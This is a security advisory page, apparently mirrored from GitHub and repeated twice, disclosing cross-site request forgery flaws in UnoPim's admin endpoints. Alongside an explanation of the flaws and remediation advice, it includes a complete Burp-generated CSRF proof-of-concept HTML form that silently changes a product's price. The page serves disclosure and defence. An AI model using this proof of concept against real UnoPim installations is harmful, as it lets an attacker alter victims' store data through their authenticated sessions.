Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-287x-6r2h-f9mw: UnoPim vulnerable to CSRF on Product edit feature and creation of other types

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF).

MethodEndpointStatusReason
POST/admin/catalog/products/createNot Vulnerable :white_check_mark:X-XSRF-TOKEN header used
GET/admin/catalog/products/copy/{id}Vulnerable :x:Missing X-XSRF-TOKEN header or similar protection
POST/admin/catalog/products/edit/{id}Vulnerable :x:Missing X-XSRF-TOKEN header or similar protection
POST/admin/settings/users/createNot Vulnerable :white_check_mark:X-XSRF-TOKEN header used

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to:

/admin/catalog/categories/create
/admin/catalog/categories/edit/{id}
/admin/catalog/category-fields/create
/admin/catalog/category-fields/edit/{id}
/admin/catalog/attributes/create
/admin/catalog/attributes/edit/{id}

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim. In this case, the POST request doesn’t need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn’t need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.
2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )
3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="&#95;token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" />
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="sku" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="channel" value="default" />
      <input type="hidden" name="locale" value="en&#95;US" />
      <input type="hidden" name="values&#91;common&#93;&#91;sku&#93;" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;sku&#93;" value="values&#91;common&#93;&#91;sku&#93;" />
      <input type="hidden" name="values&#91;common&#93;&#91;product&#95;number&#93;" value="" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;product&#95;number&#93;" value="values&#91;common&#93;&#91;product&#95;number&#93;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;name&#93;" value="test" />
      <input type="hidden" name="values&#91;common&#93;&#91;url&#95;key&#93;" value="fffkk" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;url&#95;key&#93;" value="values&#91;common&#93;&#91;url&#95;key&#93;" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;short&#95;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;title&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;keywords&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;description&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;price&#93;&#91;USD&#93;" value="7&#46;777" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;cost&#93;&#91;USD&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="false" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Attacker can perform action on behalf of the victim as this happens on the victim’s browser provide the victim is already authenticated to the application. Attacker can use an image tag to send the GET request such that when the page is loaded, it’ll get executed. As shown in the video POC, the product information can be tampered, create new categories etc.

Remediation:

  • Use CSRF token for every state changing request.
  • Use samesite: lax or strict, now it is set 'None’. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.
ghsa
Open in Source
#csrf#web#auth

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF).

Method

Endpoint

Status

Reason

POST

/admin/catalog/products/create

Not Vulnerable ✅

X-XSRF-TOKEN header used

GET

/admin/catalog/products/copy/{id}

Vulnerable ❌

Missing X-XSRF-TOKEN header or similar protection

POST

/admin/catalog/products/edit/{id}

Vulnerable ❌

Missing X-XSRF-TOKEN header or similar protection

POST

/admin/settings/users/create

Not Vulnerable ✅

X-XSRF-TOKEN header used

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to:

/admin/catalog/categories/create
/admin/catalog/categories/edit/{id}
/admin/catalog/category-fields/create
/admin/catalog/category-fields/edit/{id}
/admin/catalog/attributes/create
/admin/catalog/attributes/edit/{id}

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim.
In this case, the POST request doesn’t need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn’t need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.
2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )
3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="&#95;token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" />
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="sku" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="channel" value="default" />
      <input type="hidden" name="locale" value="en&#95;US" />
      <input type="hidden" name="values&#91;common&#93;&#91;sku&#93;" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;sku&#93;" value="values&#91;common&#93;&#91;sku&#93;" />
      <input type="hidden" name="values&#91;common&#93;&#91;product&#95;number&#93;" value="" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;product&#95;number&#93;" value="values&#91;common&#93;&#91;product&#95;number&#93;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;name&#93;" value="test" />
      <input type="hidden" name="values&#91;common&#93;&#91;url&#95;key&#93;" value="fffkk" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;url&#95;key&#93;" value="values&#91;common&#93;&#91;url&#95;key&#93;" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;short&#95;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;title&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;keywords&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;description&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;price&#93;&#91;USD&#93;" value="7&#46;777" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;cost&#93;&#91;USD&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="false" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Attacker can perform action on behalf of the victim as this happens on the victim’s browser provide the victim is already authenticated to the application.
Attacker can use an image tag to send the GET request such that when the page is loaded, it’ll get executed.
As shown in the video POC, the product information can be tampered, create new categories etc.

Remediation:

  • Use CSRF token for every state changing request.
  • Use samesite: lax or strict, now it is set 'None’. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.

References

  • GHSA-287x-6r2h-f9mw
  • https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

ghsa: Latest News

GHSA-8hmm-4crw-vm2c: @musistudio/claude-code-router has improper CORS configuration
ghsa